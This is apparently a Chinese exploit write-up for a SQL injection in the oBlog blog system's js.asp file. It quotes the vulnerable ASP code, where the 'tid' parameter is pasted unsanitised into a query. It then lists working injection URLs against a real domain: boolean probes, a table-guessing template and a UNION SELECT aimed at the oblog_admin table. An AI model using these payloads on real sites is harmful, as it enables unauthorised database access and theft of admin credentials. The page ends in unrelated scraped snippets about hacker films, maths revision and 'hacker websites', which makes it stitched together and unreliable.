漏洞文件:js.asp
<%
Dim oblog
set oblog=new class_sys
oblog.autoupdate=False
oblog.start
dim js_blogurl,n
js_blogurl=Trim(oblog.CacheConfig(3))
n=CInt(Request(”n”))
if n=0 then n=1
select case CInt(Request(”j”))
case 1
call tongji()
case 2
call topuser()
case 3
call adduser()
case 4
call listclass()
case 5
call showusertype()
case 6
call listbestblog()
case 7
call showlogin()
case 8
call showplace()
case 9
call showphoto()
case 10
call showblogstars()
Case 11
Call show_hotblog()
Case 12
Call show_teams()
Case 13
Call show_posts()
Case 14
Call show_hottag()
case 0
call showlog()
end select
****************省略部分代码******************
Sub show_posts()
Dim teamid,postnum,l,u,t
teamid=Request(”tid”)
postnum=n
l=CInt(Request(”l”))
u=CInt(Request(”u”))
t=CInt(Request(”t”))
Dim rs,sql,sRet,sAddon
Sql=”select Top ” & postnum & ” teamid,postid,topic,addtime,author,userid From oblog_teampost Where idepth=0 and isdel=0 ”
If teamid<>“” And teamid<>“0″ Then
teamid=Replace(teamid,”|”,”,”)
Sql=Sql & ” And teamid In (” & teamid & “) ”
End If
Sql=Sql & ” order by postid Desc”
Set rs=oblog.Execute(Sql)
sRet=”
”
Do While Not rs.Eof
sAddon=”"
* sRet=sRet & “ ” & oblog.Filt_html(Left(rs(2),l)) & “”
If u=1 Then sAddon=rs(4)
if t=1 Then
If sAddon<>“” Then sAddon=sAddon & “,”
sAddon=sAddon & rs(3)
End If
If sAddon<>“” Then sAddon=”(” & sAddon & “)”
sRet=sRet & sAddon & “
”
rs.Movenext
Loop
Set rs = Nothing
sRet=sRet & “
”
Response.write oblog.htm2js (sRet,True)
End Sub
调用show_posts()过程必须要符合上面的参数n=1,j=13
(” & teamid & “)
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=1 and (1=1 返回正常
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=1 and (1=2 返回异常
猜管理员表名
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 查询语句 and (1=1
Sql=”select Top ” & postnum & ” teamid,postid,topic,addtime,author,userid From oblog_teampost Where idepth=0 and isdel=0 ”
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=2 union select 1,2,3,4,5,6 from oblog_admin where id=(1
document.write('
本文导读目录: 1、以“黑客”为主题的电影有哪些? 2、有好看经典的关于黑客的电影吗, 推荐几部? 3、关于黑客的电影有哪些 ,多说点!! 4、好看的黑客电影排行 5、有那些经典的关于...
本文导读目录: 1、黑客帝国4讲的是什么故事 2、黑客帝国第一部里,莫菲斯给尼欧吃药丸《一个红的一个蓝的》,那个世界是真实的还是虚拟的? 3、求解《黑客帝国》里的红药丸和蓝药丸。求详解!...
小学数学复习计划(小学期末数学复习光靠刷题就够了) 一转眼又到期末了,各地的小学基本上都已经开始进入总复习的阶段。除了在学校有老师带着复习,在家,家长一般也都会给孩子准备一些试卷,让孩子刷刷题,提高...
广州一男子黑进500多组监控摄像头被刑拘,将会面临什么处罚? 1、目前何某已被警方依法刑事拘留。快讯详情 近年来,摄像头成为多场所经常使用的设备。2、侵入摄像头的行为受到法律的处罚吗?很显然,这是一种...
QQ强行添加好友找黑客相关问题 有没有免费黑客帮忙的相关问题 黑客进机顶盒能做什么 真实免费qq号和密码吃鸡(免费qq号和密码能登的) 黑客主要是学什么的 黑客技术自学网站...
本文目录一览: 1、黑客网网址是什么、 2、谁知道一些黑客网址啊!告诉下我,谢谢大家了,是手机能进的 3、常见的免费的黑客网站有什么? 4、求几个很好的手机黑客网址。wap! 5、黑客...